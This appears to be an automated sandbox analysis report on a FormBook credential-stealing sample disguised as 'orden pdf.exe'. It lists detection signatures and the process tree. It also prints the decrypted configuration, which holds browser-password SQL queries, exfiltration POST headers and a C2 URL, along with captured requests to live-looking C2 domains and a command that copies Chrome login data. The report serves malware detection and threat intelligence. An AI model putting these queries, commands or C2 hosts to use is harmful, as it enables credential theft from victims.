Analysis Report orden pdf.exe

Overview

General Information

Sample Name: orden pdf.exe
Analysis ID: 339334
MD5: 4f1ad14256cc9c420d78d69b468bab48
SHA1: 7734beec32b17c6ef0678533cc9634bd2c890c65
SHA256: 1f05b369246b2867a66aba3cacd9da9c2f29c03adc4d45883c91054c35ac3345
Tags: exe

Detection

Threat: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • orden pdf.exe (PID: 2224 cmdline: 'C:\Users\user\Desktop\orden pdf.exe' MD5: 4F1AD14256CC9C420D78D69B468BAB48)
    • orden pdf.exe (PID: 4700 cmdline: C:\Users\user\Desktop\orden pdf.exe MD5: 4F1AD14256CC9C420D78D69B468BAB48)
    • orden pdf.exe (PID: 5476 cmdline: C:\Users\user\Desktop\orden pdf.exe MD5: 4F1AD14256CC9C420D78D69B468BAB48)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 4120 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
          • DeviceCensus.exe.exe (PID: 5652 cmdline: 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe' MD5: 4F1AD14256CC9C420D78D69B468BAB48)
        • systray.exe (PID: 3652 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 6180 cmdline: /c del 'C:\Users\user\Desktop\orden pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 2412 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cx9l_rq2dula.exe (PID: 5296 cmdline: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe MD5: 4F1AD14256CC9C420D78D69B468BAB48)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x998f", "KEY1_OFFSET 0x1db82", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1dc80", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1c7b3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.joomlas123.info/n7ak/\u0000"]}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url | Methodology_Suspicious_Shortcut_Local_URL | Detects local script usage for .URL persistence | @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x13:$file: URL=file:///
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      2.2.orden pdf.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        2.2.orden pdf.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        2.2.orden pdf.exe.400000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        2.2.orden pdf.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          2.2.orden pdf.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          System Summary:

          Sigma detected: Drops script at startup location
          Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\Desktop\orden pdf.exe, ProcessId: 2224, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url
          Sigma detected: Steal Google chrome login data
          Source: Process started, Author: Joe Security, Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\systray.exe, ParentImage: C:\Windows\SysWOW64\systray.exe, ParentProcessId: 3652, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 2412

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 2.2.orden pdf.exe.400000.1.raw.unpack, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for dropped file
          Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe, ReversingLabs: Detection: 32%
          Source: C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exe, ReversingLabs: Detection: 32%
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe, ReversingLabs: Detection: 32%
          Multi AV Scanner detection for submitted file
          Source: orden pdf.exe, Virustotal: Detection: 50%
          Source: orden pdf.exe, ReversingLabs: Detection: 32%
          Yara detected FormBook
          Source: Yara match, File source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE
          Source: 2.2.orden pdf.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.orden pdf.exe.39e0000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: orden pdf.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          Source: Binary string: systray.pdb source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: orden pdf.exe
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 0_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 0_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 0_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 0_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 0_2_001BF56F FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 0_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 0_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 0_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 1_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 1_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 1_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 1_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 1_2_001BF56F FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 1_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 1_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 1_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 1_2_001C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\orden pdf.exe, Code function: 4x nop then pop edi
          Source: global traffic, HTTP traffic detected:
            GET /n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR HTTP/1.1
            Host: www.unbelievabowboutique.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected:
            GET /n7ak/?rN=MxLeMLg7J3XdambF4+q7RpqtyYrbwIYxF5p89mR13ayzWNjROKSjcDea1OeFglLEscbA&QZ3=dhrxPpcXO0TLHVR HTTP/1.1
            Host: www.bepbosch.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected:
            GET /n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&QZ3=dhrxPpcXO0TLHVR HTTP/1.1
            Host: www.hydrabadproperties.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
          Source: Joe Sandbox View, IP Address: 91.195.240.94
          Source: Joe Sandbox View, IP Address: 34.102.136.180
          Source: Joe Sandbox View, ASN Name: SEDO-ASDE
          Source: Joe Sandbox View, ASN Name: GOOGLEUS
          Source: global traffic HTTP traffic detected: POST /n7ak/ HTTP/1.1 Host: www.bepbosch.com Connection: close Content-Length: 408 Cache-Control: no-cache Origin: http://www.bepbosch.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.bepbosch.com/n7ak/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /n7ak/ HTTP/1.1 Host: www.bepbosch.com Connection: close Content-Length: 194340 Cache-Control: no-cache Origin: http://www.bepbosch.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.bepbosch.com/n7ak/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /n7ak/ HTTP/1.1 Host: www.hydrabadproperties.com Connection: close Content-Length: 408 Cache-Control: no-cache Origin: http://www.hydrabadproperties.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.hydrabadproperties.com/n7ak/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /n7ak/ HTTP/1.1 Host: www.hydrabadproperties.com Connection: close Content-Length: 194340 Cache-Control: no-cache Origin: http://www.hydrabadproperties.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.hydrabadproperties.com/n7ak/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
          Source: global traffic HTTP traffic detected: GET /n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR HTTP/1.1 Host: www.unbelievabowboutique.com Connection: close
          Source: global traffic HTTP traffic detected: GET /n7ak/?rN=MxLeMLg7J3XdambF4+q7RpqtyYrbwIYxF5p89mR13ayzWNjROKSjcDea1OeFglLEscbA&QZ3=dhrxPpcXO0TLHVR HTTP/1.1 Host: www.bepbosch.com Connection: close
          Source: global traffic HTTP traffic detected: GET /n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&QZ3=dhrxPpcXO0TLHVR HTTP/1.1 Host: www.hydrabadproperties.com Connection: close
          Source: unknown DNS traffic detected: queries for: www.unbelievabowboutique.com
          Source: unknown HTTP traffic detected: POST /n7ak/ HTTP/1.1 Host: www.bepbosch.com Connection: close Content-Length: 408 Cache-Control: no-cache Origin: http://www.bepbosch.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.bepbosch.com/n7ak/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
          Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
          Source: orden pdf.exe, 00000000.00000003.250435560.0000000001712000.00000004.00000001.sdmp Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES
          Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
          Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\systray.exeDropped file: C:\Users\user\AppData\Roaming\KN26O6T1\KN2logri.ini
          Source: C:\Windows\SysWOW64\systray.exeDropped file: C:\Users\user\AppData\Roaming\KN26O6T1\KN2logrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
